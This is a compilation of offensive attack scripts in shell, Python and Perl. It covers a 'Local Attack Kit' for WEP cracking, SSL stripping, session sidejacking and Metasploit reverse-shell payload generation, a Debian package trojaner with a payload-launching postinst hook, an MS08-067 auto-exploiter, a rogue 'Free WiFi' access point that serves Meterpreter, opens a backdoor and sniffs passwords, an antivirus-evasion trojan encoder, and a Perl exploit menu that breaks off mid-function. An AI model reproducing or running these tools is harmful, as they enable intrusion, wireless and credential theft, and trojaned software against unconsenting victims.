OPEXXX

#!/bin/sh

autonmap() {
clear
cat <<EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
EOF
OS=`uname`
IO="" # store IP
case $OS in
Linux) IP=`ip route show  | grep 'via'| awk '{ print $3}'`;;
*) IP="Unknown";;
esac
echo "Scanning $IP/24 This Could Take Some Time"

nmap -PN -O -sV  $IP/24 -p 0-65535 --open  -oN report
}
Windowsx86() {
clear
cat << EOF 

Please Select A Payload:

windows/meterpreter/bind_ipv6_tcp                Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_tcp                     Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/find_tag                     Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_ipv6_tcp             Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_tcp                  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/shell/bind_tcp                           Windows Command Shell, Bind TCP Stager
windows/shell/find_tag                           Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_ipv6_tcp                   Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_tcp                        Windows Command Shell, Reverse TCP Stager
windows/shell_bind_tcp                           Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw                      Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                        Windows Command Shell, Reverse TCP Inline
windows/vncinject/bind_ipv6_tcp                  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_tcp                       VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/find_tag                       VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_ipv6_tcp               VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_tcp                    VNC Server (Reflective Injection), Reverse TCP Stager



EOF
echo -n "LAK>"
read List
clear
cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF

echo -n "LAK>"
read A
clear
echo -n "Please enter your ip: "
echo 
echo -n "LAK>"
read ip
clear
echo -n "Pleas enter port: "
echo 
echo -n "LAK>"
read port
echo 
echo -n "Please Wait While Payload is Generated...."
clear
sleep 1
msfpayload windows/shell/reverse_tcp  LHOST=$ip LPORT=$port ENCODING=$A X > /root/out.exe

msfcli exploit/multi/handler PAYLOAD=$List LHOST=$ip LPORT=$port ENCODING=$A E  

}

Windowsx64() {
clear
 cat << EOF 
Please Select A Payload:
    
windows/x64/exec                        Execute Command
windows/x64/meterpreter/bind_tcp        Meterpreter,Bind TCP Stager
windows/x64/meterpreter/reverse_tcp     Meterpreter,Reverse TCP Stager
windows/x64/shell/bind_tcp              Command Shell,Bind TCP Stager
windows/x64/shell/reverse_tcp           Command Shell,Reverse TCP Stager
windows/x64/shell_bind_tcp              Command Shell,Bind TCP Inline
windows/x64/shell_reverse_tcp           Command Shell,Reverse TCP Inline
 

EOF
echo -n "LAK>"
read List
clear
cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF
echo -n "LAK>"
read A
clear
echo -n "Please enter your ip: "
echo 
echo -n "LAK>"
read ip
clear
echo -n "Pleas enter port: "
echo 
echo -n "LAK>"
read port
echo 
echo -n "Please Wait While Payload is Being Generated...."
clear
sleep 1
msfpayload windows/x64/shell/reverse_tcp  LHOST=$ip LPORT=$port ENCODING=$A X > /root/out.exe

msfcli exploit/multi/handler PAYLOAD=$List LHOST=$ip LPORT=$port ENCODING=$A E  

}

menu12() {
clear
cat << EOF
      
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF


           echo "   Please Select A Payload Type"
        echo
        echo "      1. Windowsx64"
        echo "      2. Windowsx86"
        echo "      3. Exit"
        echo 
        echo
        echo -n "LAK>"
   


}
loop() {

   while true
   do
   menu12
   read answer
   case $answer in
   1)
       Windowsx64
  ;;   
   2)
      Windowsx86
  ;;
   3)
      exit
  ;;
   *)
      loop
  ;;
   esac
   done
}





case "$1" in
    help)
   helploop
  ;;

    file)
      filoop
   ;;
   
    text)
   procloop
  ;;

   status)
   statloop
  ;;      

    *)
   helploop
  ;;
esac



wepcracker() {
macspoof() {
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo -n "Please Enter Mac Address You Would Like To Spoof: "
read spoof
ifconfig $DEVICE down
macchanger -m $spoof $DEVICE
clear 
ifconfig  $DEVICE up
echo "Your New Mac Address is $spoof"
} 

korekchopchop() { 
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -4 -b $bss -h $mac  $DEVICE 
xterm -e packetforge-ng -0 -a $bss -h $mac -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w /root/frag 
xterm -e aireplay-ng -2 -r frag -h $mac $DEVICE &
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
rm frag
}

framentation() {
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm  -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm  -e aireplay-ng -5 -b $bss -h $mac  $DEVICE 
xterm  -e packetforge-ng -0 -a $bss -h $mac -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w frag 
xterm  -e aireplay-ng -2 -r frag -h $mac $DEVICE
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
rm frag
}

injectiontest() {
clear
OS=`uname`
IO="" 
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
aireplay-ng -9 $DEVICE
}

client0841() {
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -2 -b $bss -t 1 -d FF:FF:FF:FF:FF:FF  -h $mac $DEVICE.&
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng
rm out* 
rm wep-0*
rm replay_*
}



arpreplay() { 
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -3 -b $bss -h $mac $DEVICE &
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
}

menu1() {
   clear
tput setaf 9; cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
            
EOF
   
echo "   Please Select A Type Of Attack"
echo
echo "      1. Client Based Arp Replay"
echo "      2. Client Based 0841"
echo "      3. Clientless Fragmentation"
echo "      4. Clientless Korek Chop Chop"
echo "      5  Injection Test"
echo "      6. Spoof Mac Address"
echo "      7. Exit"
echo
echo -n "     LAK>"
}
menu2() {

   while true
   do
   menu1
   read answer
   case $answer in
   1)
      arpreplay
  ;;   
   2)
      client0841
  ;;
   3)
      framentation
  ;;
   4)
      korekchopchop  
  ;;
   5)
      injectiontest
  ;;
   6)
    macspoof
  ;;
   7)
    exit
  ;;
   *)
     menu2
  ;;
   esac
   done
}

case "$1" in
    help)
   menu2
  ;;     

    *)
   menu2
  ;;
esac
}
sslsniff() {
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
OS=`uname`
IO="" 
case $OS in
   Linux) iface=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) iface="Unknown";;
esac
OS=`uname`
IO="" 
case $OS in
   Linux) tdg=`ip route show |grep "via" | awk  '{print $3}'`;;
   *) tdg="Unknown";;
esac
echo -n "Please Enter Target Ip To Sniff: "
read tip
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
EOF

echo "The selected interface is $iface"
echo "The target gateway is $tdg"
echo "Starting....."
sleep 2 
clear
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
xterm -e arpspoof -i $iface -t $tip $tdg &
xterm -e  python /pentest/web/sslstrip/sslstrip.py -a -l 8080 &
clear
ettercap -T -q -i $iface -M arp:remote /$tip/ /$tdg/

}

sidejack() {
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
echo -n "Please Set Proxy to http://127.0.0.1 on port 1234 in firefox"
echo
sleep 5 
echo 
OS=`uname`
IO="" 
case $OS in
   Linux) iface=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) iface="Unknown";;
esac 
/pentest/sniffers/hamster/ferret -i $iface & 
xterm -e /pentest/sniffers/hamster/hamster 
killall hamster
killall ferret
}
menu1(){
clear
cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
                           
Local Attack Kit Main Menu :                            

     1. WEP Cracking
     2. WPA Cracking
     3. SSL Sniffing
     4. Side Jacking
     5. AutoNmap
     6. PayloadGen
     7. Exit
EOF
echo 
echo 
echo -n "     LAK>"
}
menu2() {

   while true
   do
   menu1
   read answer
   case $answer in
   1)
      wepcracker
  ;;   
   2)
      wpacracker
  ;;
   3)
      sslsniff
  ;;
   4)
      sidejack  
  ;;
   5)
      autonmap
  ;;
   6)
    loop
  ;;
   7)
  exit
  ;;
   *)
     menu2
  ;;
   esac
   done
}
case "$1" in
    help)
   menu2
  ;;

    file)
      filoop
   ;;
   
    text)
   procloop
  ;;

   status)
   statloop
  ;;      

    *)
   menu2
  ;;
esac

#!/bin/bash

# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author:  Aaron Hine - @redmeat_uk
# Date: 31-01-2010

# Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.  
# The author is not liable for any illegal use of this script.

scriptname=`basename "$0"`

  if [[ $UID -ne 0 ]]; then
     echo "${scriptname} must be run as root"
     exit 1
  fi

# 
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo 

# change these vars to suit your needs
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"

# prompt for package name and setup dirs
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read package
apt-get --download-only install $package
echo
mkdir $tmpdir
mkdir $workdir
mv /var/cache/apt/archives/$package* $tmpdir
mkdir $workdir/DEBIAN
dpkg -x $tmpdir/$package* $workdir
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
echo
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo 
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read choice


if [ "$choice" -eq 1 ]; then
        payload="linux/x86/shell/bind_tcp"
                echo "Enter IP:"
                read rhostIP
                echo "Enter port:"
                read bindport
                options="RHOST=$rhostIP LPORT=$bindport"
else
        if [ "$choice" -eq 2 ]; then
                payload="linux/x86/shell/reverse_tcp"
                echo "Enter IP:"
                read lhostIP
                echo "Enter port:"
                read revport
                options="LHOST=$lhostIP LPORT=$revport" 
        fi
fi

echo
echo "Please enter the filename for the Metasploit payload:"
read filename
echo

cd $workdir
binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
trojan="$filename"

echo "Making post-install script..."
echo

echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst

trojan2=`echo $binary$trojan | sed -e 's/^\///'`

echo "Thanks - generating your payload..."
$msfdir/msfpayload $payload $options X > $workdir/$trojan2
echo

cd $workdir/DEBIAN
chmod 755 postinst
dpkg-deb --build $workdir
cd $tmpdir

echo
echo "Please enter your webroot directory:"
read webroot
mv $tmpdir/work.deb $webroot/$package.deb
rm -rf $tmpdir

echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo

webserver="python -m SimpleHTTPServer 80"

echo "Would you like a Python webserver ? (y/n) :"
read svr
echo

if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
        cd $webroot
        $webserver & 
        echo
        else
           echo "Fair nuff, setup your own webserver :)"
           echo
fi

sleep 1

echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read handler
echo
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo

if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
        echo
        $msfdir/msfcli exploit/multi/handler payload=$payload $options E
        else
                echo "Fair nuff, setup your own handler :)"
                echo
fi

#!/usr/bin/env python
#
# File_Name: SMB checker and exploiter 'MS08-067'
# Written by: Ahmed shawky aka lnxg33k < ahmed@isecur1ty.org >
# Thanks: Dave Relik from #social-engineer --> freenode
# home: live.isecur1ty.org  lnxg33k.wordpress.com
#

import os
import sys
import subprocess
import re

if os.getuid() != 0: 
  print 'requires root privileges.'
  sys.exit(1) 

def usage():
  if len(sys.argv) != 4:
    print 'Usage: ./smb.py [RemoteHost] [LocalHost] [LocalPort]'
    print 'EX)    ./smb.py 192.168.1.50 192.168.1.6 443'
    sys.exit(1)
usage()

print """ 
  ************************************************
  **\tSMB checker and exploiter 'MS08-067' \t**
  **\tWritten by: Ahmed Shawky aka lnxg33k \t**
  **\tThanks: Dave Relik @ #social-engineer\t**
  ************************************************
"""

RHOST = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]

nmap = subprocess.Popen('nmap -sS -p445 --script smb-check-vulns.nse %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()

f = open('/tmp/nmap.txt', 'rU')
reader = f.read() 
found = re.search(r'[|]\s\s\sMS08-067:\sVULNERABLE', reader)   #|   MS08-067: VULNERABLE
if not found:
  print '\nSystem is not vulnerable'
  sys.exit(1) 

print '\nLooks like it\'s a vulnerable host'
print 'I will exploit it for you\n'


metasploit = subprocess.Popen('msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=%s LHOST=%s LPORT=%s E' %(RHOST,LHOST,LPORT), shell=True).wait()

print '[**] Nice PWN'
subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()

#! /bin/bash

# (C)opyright 2009 - g0tmi1k

#

# FakeAP_pwn.sh

# Settings

export  gatewayip=192.168.1.1

export internet_interface=wlan0

export   fakeap_interface=wlan1

echo “[>] Starting: FakeAP_pwn - g0tmi1k”

# FakeAP

echo “[+] Setting up FakeAP”

modprobe tun 

xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e “Free WiFi” $fakeap_interface -v&

sleep 2

# Tables

echo “[+] Setting up forwarding tables…”

ifconfig lo up

ifconfig at0 up

ifconfig at0 10.0.0.1 netmask 255.255.255.0 

ifconfig at0 mtu 1400

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip

#iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface at0 -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE

# DHCP

echo “[+] Setting up DHCP server…”

xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&

sleep 2

# Need the user to come here

echo “[+] Start web server…”

#xterm -geometry 75x25+1+200  -T WebServer -e sh -c “start-apache”&

xterm -geometry 75x25+1+200  -T WebServer -e /etc/init.d/apache2 start

sleep 2

# So lets force them!

echo “[+] Force user to vist our site…”

iptables -t nat -A PREROUTING -p tcp —dport 80 -j DNAT —to 10.0.0.1

# Bad boy stuff!

echo “[+] Here comes metasploit…”

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe

echo “[+] Uploading SBD…”

xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&

sleep 2

# upload //root/FakeAP_pwn/ C:/

# execute -f “C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1”

#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# Wait till user is connected

rm -r /tmp/FakeAP_pwn.tmp

echo “[-] Waitng for target to connect…”

while [ ! -e /tmp/FakeAP_pwn.tmp ]; do

sleep 1

done

# They give us access to their system, so lets give them internet back ;)

echo “[+] Give them (our) internet back…”

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip

#iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface at0 -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE

# Lets connect! =)

# *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***

echo “[+] Lets us back in…”

konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&

sleep 2 

# Get as much info as poss!

echo “[+] Watch what they do…”

# URLs

xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&

# Passwords

xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&

# IM Chats

xterm -geometry 100x10+470+300 -T “IM Chat” -e msgsnarf -i wlan0&

echo 

echo “[+] DONE - Have you, g0tmi1k?”

# Lets get some stuff from metasploit whistle we are at it!

#sysinfo

#getuid

#use priv

#hashdump > /tmp/FakeAP_pwn-hash.txt

##session -l

##session -i 1

# Lets crack the hash

#cd /pentest/passwords/jtr/

#./john /tmp/FakeAP_pwn-hash.txt

#!/bin/bash

# counts to mangle the trojan to avoid av detect

# keep low we want close to normal filesize for user not to suspect anything

count=15

if [[ -z $3 ]];then

        echo “usage $(basename $0) <revservip> <revservport> <binary filename>”

        echo “to attach to filename_out.exe”

        echo “doesn’t work well for PU binaries, they say”

        exit 0

else

        ip=$1

        port=$2

        bin=$3

        tdir=$(dirname $bin)

        echo “encoding ${bin}-out.exe , mangling $count times”

fi

msfpayload windows/shell/reverse_tcp LHOST=${ip} LPORT=${port} R | \

    msfencode -x “${tdir}/${bin}” -t exe -e x86/shikata_ga_nai -o “${tdir}/${bin%%.*}-out.exe” -c $count

#        msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E

print “##############################\n”;

print “#                            #\n”;

print “#   ##### #   #   ##  #  #   #\n”;

print “#   #     #   #  #  # # #    #\n”;

print “#   ####  #   # #     ##     #\n”;

print “#   #     #   #  #  # # #    #\n”;

print “#   #      ###    ##  #  #   #\n”;

print “#                            #\n”;

print “# #    # #   ##  ###    ##   #\n”;

print “# # # ## #  #  # #  #  #  #  #\n”;

print “# #  # # # #     ###  #    # #\n”;

print “# #    # #  #  # #  #  #  #  #\n”;

print “# #    # #   ##  #   #  ##   #\n”;

print “#                            #\n”;

print “#   ##    ##   ##### ######  #\n”;

print “#  #  #  #  #  #        #    #\n”;

print “#   #   #    # ####     #    #\n”;

print “# #  #   #  #  #        #    #\n”;

print “#  ##     ##   #        #    #\n”;

print “#                            #\n”;

print “##############################\n”;

system(“sleep 3”);

system(“clear”);

SploitMenu:

print ” ##################\n”;

print ” #  Exploit Menu  #\n”;

print ” ##################\n”;

print ” 1 - Run MS-08-067 \n”;

print ” 2 - Run MS-10-061 \n”;

print ” 3 - Run MS-03-026 \n”;

print ” 4 - Run MS-04-031 \n”;

print ” 5 - Run MS-07-029 \n”;

print ” 6 - Exit          \n”;

print “—————————-\n”;

print “\n\nCh0mpy-Pwn>”;    

$choice =<STDIN> ;

if ($choice==1){&ms08067};

if ($choice==2){&ms10061};

if ($choice==3){&dcom};

if ($choice==4){&netdde};

if ($choice==5){&zonename};

if ($choice==6){&exit};

sub ms08067

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-08-067 on them and gives you a Meterpreter shell \n”;

print ” Conficker Style liek a baws \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms08_067_netapi RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub ms10061

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-10-061 on them and gives you a Meterpreter shell \n”;

print ” Owning liek a Stuxnet \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms10_061_spoolss RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub dcom

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-03-026 on them and gives you a Meterpreter shell \n”;

print ” Dcom vulns… Patch plz lol \n”;

